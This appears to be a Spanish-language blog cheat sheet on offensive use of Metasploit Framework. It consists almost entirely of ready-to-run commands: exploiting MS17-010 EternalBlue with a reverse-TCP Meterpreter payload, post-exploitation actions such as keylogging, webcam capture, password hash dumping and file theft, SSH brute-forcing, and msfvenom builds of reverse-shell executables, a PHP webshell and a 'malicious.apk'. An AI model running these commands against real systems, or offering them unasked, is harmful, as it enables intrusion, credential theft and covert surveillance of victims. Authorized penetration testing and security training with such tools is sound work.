← Volver al inicio
Metasploit Exploitation Meterpreter Payload Post-Explotación

Metasploit Framework: Explotación

10/03/2022

Metasploit Framework es la plataforma de explotación más utilizada en ciberseguridad ofensiva. Permite desarrollar, probar y ejecutar exploits contra sistemas objetivo en un entorno controlado.

1. Iniciar Metasploit

# Iniciar la base de datos PostgreSQL:
service postgresql start

# Iniciar Metasploit:
msfconsole

# Verificar conexión con la base de datos:
db_status

2. Flujo básico de explotación

# 1. Buscar un exploit:
search ms17-010
search type:exploit platform:windows smb

# 2. Seleccionar el exploit:
use exploit/windows/smb/ms17_010_eternalblue

# 3. Ver opciones requeridas:
show options

# 4. Configurar el objetivo:
set RHOSTS 192.168.1.10
set LHOST 192.168.1.5     # Nuestra IP (para reverse shell)
set LPORT 4444

# 5. Ver payloads compatibles:
show payloads

# 6. Seleccionar payload:
set PAYLOAD windows/x64/meterpreter/reverse_tcp

# 7. Ejecutar:
exploit
# o
run

3. Meterpreter — Post-explotación

# Información del sistema:
sysinfo
getuid
getpid

# Subir/bajar archivos:
upload /ruta/local/archivo.exe C:\\Windows\\Temp\\
download C:\\Users\\Admin\\passwords.txt /tmp/

# Captura de pantalla:
screenshot

# Activar cámara:
webcam_snap

# Capturar pulsaciones de teclado:
keyscan_start
keyscan_dump
keyscan_stop

# Obtener hashes de contraseñas:
hashdump

# Shell del sistema:
shell

# Elevar privilegios:
getsystem

# Pivotar a otra máquina de la red:
route add 10.10.10.0/24 [session_id]

4. Módulos auxiliares útiles

# Escaneo de puertos integrado:
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
run

# Escaneo SMB:
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.0/24
run

# Fuerza bruta SSH:
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.10
set USERNAME root
set PASS_FILE /usr/share/wordlists/rockyou.txt
run

# Escaneo de vulnerabilidades web:
use auxiliary/scanner/http/dir_scanner
set RHOSTS 192.168.1.10
set VHOST www.target.com
run

5. Creación de payloads con msfvenom

# Payload Windows EXE (reverse shell):
msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.5 LPORT=4444 \
  -f exe -o shell.exe

# Payload Linux ELF:
msfvenom -p linux/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.5 LPORT=4444 \
  -f elf -o shell

# Payload PHP (webshell):
msfvenom -p php/meterpreter/reverse_tcp \
  LHOST=192.168.1.5 LPORT=4444 \
  -f raw -o shell.php

# Payload Android APK:
msfvenom -p android/meterpreter/reverse_tcp \
  LHOST=192.168.1.5 LPORT=4444 \
  -o malicious.apk

6. Listener (multi/handler)

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.5
set LPORT 4444
exploit -j   # -j = en segundo plano (job)

Gestión de sesiones

sessions -l          # Listar sesiones activas
sessions -i 1        # Interactuar con sesión 1
sessions -k 1        # Cerrar sesión 1
background           # Poner sesión en segundo plano